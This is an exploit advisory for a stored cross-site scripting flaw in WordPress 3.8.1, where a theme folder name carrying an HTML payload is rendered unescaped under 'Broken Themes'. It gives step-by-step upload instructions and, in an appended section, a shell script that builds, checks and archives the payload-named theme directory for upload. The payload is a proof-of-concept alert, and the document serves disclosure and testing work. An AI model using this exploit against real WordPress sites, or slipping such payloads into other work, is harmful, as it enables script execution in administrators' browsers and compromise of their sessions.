Wordpress 3-8-1-stored-xss


#######################################################################
# Wordpress <= 3.8.1 Stored XSS (Requires Admin Privileges)
#
# Author : Mehmet Dursun INCE - [email protected]
# Job : Pentest Leader at IntelRAD.
# Twitter: @mmetince
# Found : 9 Feb
# Tested on: Wordpress 3.8.1 on CentOS.
#######################################################################

Vulnerability Discovery:

First of all, I want to remind you that you need privileges to add a new theme to the WordPress installation, either on the server side via FTP/SFTP (write access to wp-content/themes) or through the WordPress GUI (in practice, an administrator account). This is why the issue is rated as requiring admin privileges.

1 - WordPress checks each installed theme for validity. If a theme is not valid, WordPress warns you about it under the "Broken Themes" section of the theme management page.

2 - "test" is the folder name of the theme you want to add to WordPress. Because the "Broken Themes" section prints that folder name, the folder name itself is the injection point for the XSS payload. As you know, characters such as <, > and " are legal in folder names on Linux (Windows filesystems reject them), so the payload can be written straight into the directory name.

3 - Let's create a "broken theme". That is easy, because we know that WordPress expects to find a stylesheet (style.css) in every theme folder; a folder without one is reported as broken.

4 - Let's upload that folder to /[wordpress_full_path]/wp-content/themes.


5 - I uploaded that folder via SFTP.

mince@rootlab:/tmp$ scp xss.zip [email protected]:/[wp-full-path]/wp-content/themes
xss.zip                                       100%  194     0.2KB/s   00:00
mince@rootlab:/tmp$

6 - Our malformed theme is now under the themes folder.

7 - Decompress it, so that the theme folder (with the payload in its name) sits directly under wp-content/themes.


8 - Let's refresh the theme management page. The folder name is rendered unescaped in the "Broken Themes" section, so the payload stored in it executes in the browser of whoever views that page.

9 - EOF!
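The staging part of the procedure (steps 2 to 5 and 7) as a script, added here as an example; it is not part of the original advisory. The staging root, the payload text and the readme.txt placeholder are constructed for illustration, and the script assumes what step 3 relies on: a theme directory with no style.css is what WordPress reports as broken, and its directory name is what the "Broken Themes" section prints. It must run on Linux, since the characters <, > and " are rejected by Windows filesystems.

```shell
#!/bin/sh
# Added example (not from the original advisory): stage a "broken theme" whose
# directory name carries the XSS payload, then archive it for upload.
# Assumptions: WordPress flags a theme directory without style.css as broken
# and prints the raw directory name; payload and paths below are constructed.

# The directory name doubles as the payload (hypothetical marker text).
PAYLOAD='test<img src=x onerror=alert(document.domain)>'

# make_broken_theme STAGE NAME -> prints the created theme directory
make_broken_theme() {
    stage="$1"
    name="$2"
    dir="$stage/$name"
    mkdir -p "$dir" || return 1
    # Deliberately no style.css: that is what makes the theme "broken".
    # The placeholder file only keeps archivers from skipping the directory.
    : > "$dir/readme.txt"
    printf '%s\n' "$dir"
}

# is_broken_theme DIR -> true when the directory lacks the stylesheet
# WordPress expects, i.e. when it would land under "Broken Themes"
is_broken_theme() {
    [ -d "$1" ] && [ ! -f "$1/style.css" ]
}

# pack_theme STAGE ARCHIVE -> archive everything under STAGE
# (zip as in step 5, falling back to tar when zip is not installed)
pack_theme() {
    stage="$1"
    out="$2"
    if command -v zip >/dev/null 2>&1; then
        (cd "$stage" && zip -qr "$out" .) || return 1
    else
        tar -C "$stage" -cf "$out" . || return 1
    fi
    [ -s "$out" ]
}

# Stand-alone run: build the theme, confirm it is broken, archive it.
stage=$(mktemp -d)
dir=$(make_broken_theme "$stage" "$PAYLOAD")
if is_broken_theme "$dir"; then
    printf 'broken theme staged under: %s\n' "$stage"
    ls "$stage"   # the raw payload is visible as the directory name
fi
pack_theme "$stage" "$stage.zip" && printf 'archive: %s\n' "$stage.zip"
# Upload as in step 5 (placeholder host and path, not run here), then unzip
# it inside wp-content/themes as in step 7:
#   scp "$stage.zip" user@host:/[wp-full-path]/wp-content/themes
```

The archive step is separate from the directory creation so the same staging directory can be copied with scp or with the WordPress theme uploader, whichever route the available privileges allow.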